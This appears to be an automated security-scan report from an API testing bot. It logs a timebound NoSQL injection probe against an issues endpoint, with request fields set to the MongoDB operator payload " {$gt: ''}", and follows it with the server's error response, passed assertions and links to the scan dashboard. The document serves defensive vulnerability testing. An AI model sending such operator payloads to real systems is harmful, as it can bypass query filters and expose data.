00:43:24 [D] [AVIUPBPNSITimebound] : Request [{ "assertions" : " {$gt: ''}", "assignedTo" : " {$gt: ''}", "createdBy" : "", "createdDate" : "", "description" : " {$gt: ''}", "endpoint" : " {$gt: ''}", "env" : " {$gt: ''}", "failedAssertions" : " {$gt: ''}", "headers" : [ "RDoICxba" ], "id" : "", "inactive" : false, "issueName" : " {$gt: ''}", "issueStatus" : "OPEN", "issueType" : "MANUAL", "method" : "HEAD", "modifiedBy" : "", "modifiedDate" : "", "project" : { "createdBy" : "", "createdDate" : "", "description" : " {$gt: ''}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " {$gt: ''}", "org" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : " {$gt: ''}", "version" : "" }, "refId" : " {$gt: ''}", "version" : "" }, "requestBody" : " {$gt: ''}", "responseBody" : " {$gt: ''}", "responseHeaders" : " {$gt: ''}", "result" : " {$gt: ''}", "statusCode" : " {$gt: ''}", "tags" : [ "RDoICxba" ], "version" : "" }]
00:43:24 [D] [AVIUPBPNSITimebound] : Status code [200]
00:43:24 [D] [AVIUPBPNSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=M2EyY2FiZDAtMGI1MC00MTMwLThlOGQtOTUxYjUxMDhjZDE2; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 05 Aug 2021 00:43:23 GMT"]]
00:43:24 [D] [AVIUPBPNSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-08-05T00:43:24.414+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : null, "value" : "Invalid request for project" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }]
00:43:24 [D] [AVIUPBPNSITimebound] : Response time [585]
00:43:24 [D] [AVIUPBPNSITimebound] : Response size [203]
00:43:24 [I] [AVIUPBPNSITimebound] : Assertion [@ResponseTime < 7000 OR @ResponseTime > 10000] resolved-to [585 < 7000 OR 585 > 10000] result [Passed]
00:43:24 [I] [AVIUPBPNSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]

IMPORTANT LINKS

Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8093e87b0686f1017b13c3d1174e50/details

Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans

Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit

Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8093e87b0686f1017b13c24e804c82

Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1IssuesUiPostBodyParamNoSqlInjectionTimebound

Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories

Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8093e87b0686f1017b13c3d1174e50/codesamples

PS: Please contact support@apisec.ai for apisec access and login issues.

--- apisec Bot ---